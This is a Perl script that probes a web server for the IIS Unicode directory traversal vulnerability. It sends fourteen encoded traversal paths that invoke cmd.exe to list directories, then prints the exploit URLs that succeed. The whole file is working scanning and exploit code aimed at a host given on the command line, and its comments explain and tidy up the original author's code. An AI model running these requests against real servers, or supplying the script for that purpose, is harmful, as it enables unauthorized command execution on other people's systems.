#!/usr/bin/perl
#
# Uni2.pl checks a host for the recent IIS Unicode vulnerability
# in 14 different ways. Also gives you the browser URL for the
# exploit. Originally by Stealthmode316, modifications by Roeland
#
# 
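use Socket;
use warnings;

# These three are read by sendraw() below as package globals, so they are
# declared with `our` rather than `my`.  $target is the packed IPv4 address.
our ($host, $port, $target);

MAIN: {
    use strict;

    # --------------init
    unless (@ARGV) {
        die "UNICODE-CHECK\n\nExample: ./uni.pl www.target.com:80\n";
    }

    # The usage text documents "host:port", but the original hard-wired port
    # 80 and handed the whole "host:port" string to inet_aton(), which then
    # failed to resolve.  Split it here; a bare host name still defaults to 80.
    ($host, my $given_port) = split /:/, $ARGV[0], 2;
    $port = (defined $given_port && $given_port =~ /\A\d+\z/) ? $given_port : 80;

    $target = inet_aton($host);
    unless (defined $target) {
        # Same wording sendraw() uses, so callers scripting around the output
        # see one message for an unresolvable name.
        print "$host: Host not found\n";
        exit;
    }

    my $flag = 0;

    # The 14 request paths from the original "test method 1..14" sections, in
    # the same order.  Each asks cmd.exe for a directory listing through one
    # encoded traversal path; the printed result is the same path prefixed by
    # the host, exactly as before.
    my @probe_paths = (
        '/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',
        '/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir',
        '/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir',
        '/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir',
    );

    for my $path (@probe_paths) {
        my @response = sendraw("GET $path HTTP/1.0\r\n\r\n");

        # The word "Directory" anywhere in the reply is taken as evidence that
        # a listing came back.  This is a loose oracle: an error page that
        # happens to contain the word matches too, so treat a hit as something
        # to confirm rather than a proof.  The original printed the URL once
        # per matching line; one line per probe is enough.
        if (grep { /Directory/ } @response) {
            $flag = 1;
            print "$host$path\n";
        }
    }

    if ($flag != 1) {
        print "$host: Not vulnerable\n";
        exit;
    }
}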

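# sendraw($request) — send one raw HTTP request and return the reply lines.
#
# Reads the package globals $host, $port and $target (packed IPv4 address)
# that the main block sets up.  Returns the list of response lines, line
# terminators included, once the server closes the connection.  On a name
# lookup or connect failure it prints a diagnostic and exits the whole
# script, as the original did; a socket() failure dies.
#
# There is no read timeout: a server that accepts the connection but never
# closes it will block the scan indefinitely.
sub sendraw {
    my ($request) = @_;

    # The original re-resolved the name on every call; keep that check so a
    # name that stops resolving mid-run still yields "Host not found".
    unless (defined $target && gethostbyname($host)) {
        print "$host: Host not found\n";
        exit;
    }

    # The original called gethostbyname('tcp') here, which never returns a
    # protocol number; getprotobyname() is the lookup that was intended.
    my $proto = getprotobyname('tcp') || 0;
    socket(my $sock, PF_INET, SOCK_STREAM, $proto)
        or die "Socket problems\n";

    # sockaddr_in() builds the address portably; the hand-packed "SnA4x8"
    # encoded the family field in host byte order.
    unless (connect($sock, sockaddr_in($port, $target))) {
        print "$host: Can't connect\n";
        exit;
    }

    # Unbuffer the socket without leaving it selected as the default handle.
    my $previous = select($sock);
    $| = 1;
    select($previous);

    print {$sock} $request;
    my @lines = <$sock>;    # blocks until the server closes the connection
    close($sock);
    return @lines;
}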
